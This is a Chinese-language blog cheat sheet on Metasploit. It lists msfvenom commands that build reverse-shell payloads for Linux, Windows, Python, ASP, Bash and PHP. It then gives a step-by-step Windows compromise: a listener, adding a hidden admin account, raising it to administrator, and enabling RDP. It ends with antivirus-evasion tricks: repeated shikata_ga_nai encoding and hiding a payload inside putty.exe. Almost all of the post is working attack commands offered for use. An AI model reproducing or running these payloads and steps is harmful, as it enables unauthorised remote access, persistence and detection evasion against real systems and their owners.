zoukankan      html  css  js  c++  java
  • Msf小结

    Msfvenom是有效负载生成和编码的组合。

    生成攻击载荷

    Linux下反弹Meterpreter shell

    1
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell

    C反弹shell

    1
    msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "x00x0ax0d" -a x86 --platform win -f c

    Python反弹shell

    1
    msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py

    Asp反弹shell

    1
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

    Bash反弹shell

    1
    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

    PHP反弹shell

    1
    msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.php

    Windows反弹shell

    1
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

    64位系统要加x64

    1
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

    Windows提权

    第一步生成Windows攻击载荷

    1
    msfvenom -p windows/meterpreter/reverse_tcp lhost=本机IP -f exe >/home/shell.exe

    第二步MSF监听

    1
    2
    3
    4
    5
    6
    use exploit/multi/handler                       //设置模块
    set payload windows/meterpreter/reverse_tcp //配置payload
    show options //显示选项
    set LHOST 本机IP //设置ip地址,注意,这个要与上面攻击载荷里面的相同
    set LPORT 端口 //设置端口,这个也要相同
    exploit //执行攻击

    第三步提权

    1
    2
    3
    4
    5
    6
    7
    shell              //进入终端
    net user //查看用户
    net user admin admin /add //创建一个admin用户
    net localgroup administrators admin /add //提权
    net user admin //admin用户的信息
    exit //退出bash终端
    run getgui -e //开启3389端口

    第四步开启远程连接

    1
    2
    3
    4
    开启远程桌面
    run post/windows/manage/enable_rdp
    连接
    rdesktop -u 用户名 -p 密码

    免杀

    多次编码免杀

    1
    msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe

    自定义二进制代码的文件模板免杀

    1
    msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe
  • 相关阅读:
    Java开发常用知识点总结
    Net实现阿里云开放云存储服务(OSS)
    KEIL MDK-ARM Version 5.26正式版开发工具下载
    【NXP开发板应用—智能插排】4. PWM驱动
    【NXP开发板应用—智能插排】3.驱动GPIO点亮外接LED
    【NXP开发板应用—智能插排】2.初步解析example之GPI
    【NXP开发板应用—智能插排】1.如何使用scp传输文件
    Keil MDK最新版 5.25介绍及下载地址
    springmvc框架helloword
    单例设计模式
  • 原文地址:https://www.cnblogs.com/ihacker/p/11420661.html
Copyright © 2011-2022 走看看